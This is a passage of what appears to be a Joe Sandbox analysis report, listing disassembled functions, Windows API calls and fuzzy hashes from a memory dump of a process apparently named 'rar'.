                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF69A443CEF,?,?,00000000,00007FF69A443CAA,?,?,00000000,00007FF69A443FD9), ref: 00007FF69A449807
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF69A443CEF,?,?,00000000,00007FF69A443CAA,?,?,00000000,00007FF69A443FD9), ref: 00007FF69A449841
                                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF69A443CEF,?,?,00000000,00007FF69A443CAA,?,?,00000000,00007FF69A443FD9), ref: 00007FF69A44986B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1557788787-0
                                                                                                                                                                                                                                      • Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                                      • Instruction ID: 9d407de6fbbee5277e4cec0748ff96fad806b78d10f7f131864c052806daf663
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49218131E1879186EA708F17A440129B6E4FB84FD0F4842B5DE8EA3B95DF7CE8529344
                                                                                                                                                                                                                                      Function 00007FF69A401C74 Relevance: 6.1, APIs: 4, Instructions: 55fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2244327787-0
                                                                                                                                                                                                                                      • Opcode ID: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
                                                                                                                                                                                                                                      • Instruction ID: 58ff6043a427ce57736917a17085703e0014dac74aa3e89a1b84a7358074386f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28216D21E0C56682EB708B29E40033972E4FFA3F98F1041F2EA59C66C4CE2DE880A741
                                                                                                                                                                                                                                      Function 00007FF69A42B850 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 502429940-0
                                                                                                                                                                                                                                      • Opcode ID: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                                                                                                                                                                                                      • Instruction ID: fe161080a398b2273fdc7b79eb58209b352f89f5ed7cff20477803a3204902e4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07118236A14E4197E2249F20E54466DB3B0FBC6FA0F0012B1DBAE936A5CF39E476C704
                                                                                                                                                                                                                                      Function 00007FF69A3F49F8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: AFUM$default.sfx
                                                                                                                                                                                                                                      • API String ID: 0-2491287583
                                                                                                                                                                                                                                      • Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                                      • Instruction ID: 27414e84092b83246333c804ae71f36974dce411904d1af4d7974dc6618c14d2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A81C022A1C68291FB709B1295002BD32E0EF51B84F4480FEDE8DC76D6DF6DA896E750
                                                                                                                                                                                                                                      Function 00007FF69A4465BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileHandleType
                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                      • API String ID: 3000768030-2766056989
                                                                                                                                                                                                                                      • Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                                      • Instruction ID: 8072d5cfdb551fb8525809fbf8b0b27b356f0211a16d2a5561b23ee20b80ec94
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09216122A1874241FB748F29A494139B6D5EB85F74F2813F5DA6E8B7D8CE38E881C341
                                                                                                                                                                                                                                      Function 00007FF69A42B9BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                                                                                                                                                                                                      • String ID: CreateThread failed
                                                                                                                                                                                                                                      • API String ID: 1217111108-3849766595
                                                                                                                                                                                                                                      • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                      • Instruction ID: 373c51ce437382f8fbff48317b969f39a7aa1d6d819357ec93ef5c1c4ea501a8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1113D32A18A4282EB24DF24E8441A973A0FB84B84F5481F6EA9DC2669DF7CE557C740
                                                                                                                                                                                                                                      Function 00007FF69A42BB80 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3094578987-0
                                                                                                                                                                                                                                      • Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                                      • Instruction ID: 3d5be519be48939db660647394ebdf365ca9b0c92a5d372304d9636453a34513
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43F01226A08A4682DE709F11E54407973A1FBC9F99F5451F0DE9DC6669CE2CD546CB00
                                                                                                                                                                                                                                      Function 00007FF69A3F7B44 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ConsoleFileHandleModeType
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4141822043-0
                                                                                                                                                                                                                                      • Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                                      • Instruction ID: 3b7b8918921a8e881d2d24468e236801415153e21926f30ede7782f57021b867
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0E0EC28E1960247FF685761A8691B932D1DF9AB91F5420F8D90FCA350EE2C99868700
                                                                                                                                                                                                                                      Function 00007FF69A442488 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                                      • Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                                      • Instruction ID: d9ac088e9db16a1ec6a5d6c58747c45d7741a1c0adadd9218bf7547056191142
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAE09A24A0874546EAA46F65988537933D2EF85F41F1065F8CD4EC7392CE3DA4498350
                                                                                                                                                                                                                                      Function 00007FF69A404044 Relevance: 3.3, APIs: 2, Instructions: 336COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharEnvironmentExpandStrings
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4052775200-0
                                                                                                                                                                                                                                      • Opcode ID: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
                                                                                                                                                                                                                                      • Instruction ID: 402870ea6cd7ac0447825b222b25c355c930196caa587547040f9f6e0fae56b0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71E1E022A186A285EB709F24D4001BE77E0FBA1B94F5441F1DB9E87AD9DF7CE481D780
                                                                                                                                                                                                                                      Function 00007FF69A401AF0 Relevance: 3.1, APIs: 2, Instructions: 85fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF69A3F7EBE,00000000,00000000,00000000,00000000,00000007,00007FF69A3F7C48), ref: 00007FF69A401B8D
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF69A3F7EBE,00000000,00000000,00000000,00000000,00000007,00007FF69A3F7C48), ref: 00007FF69A401BD7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
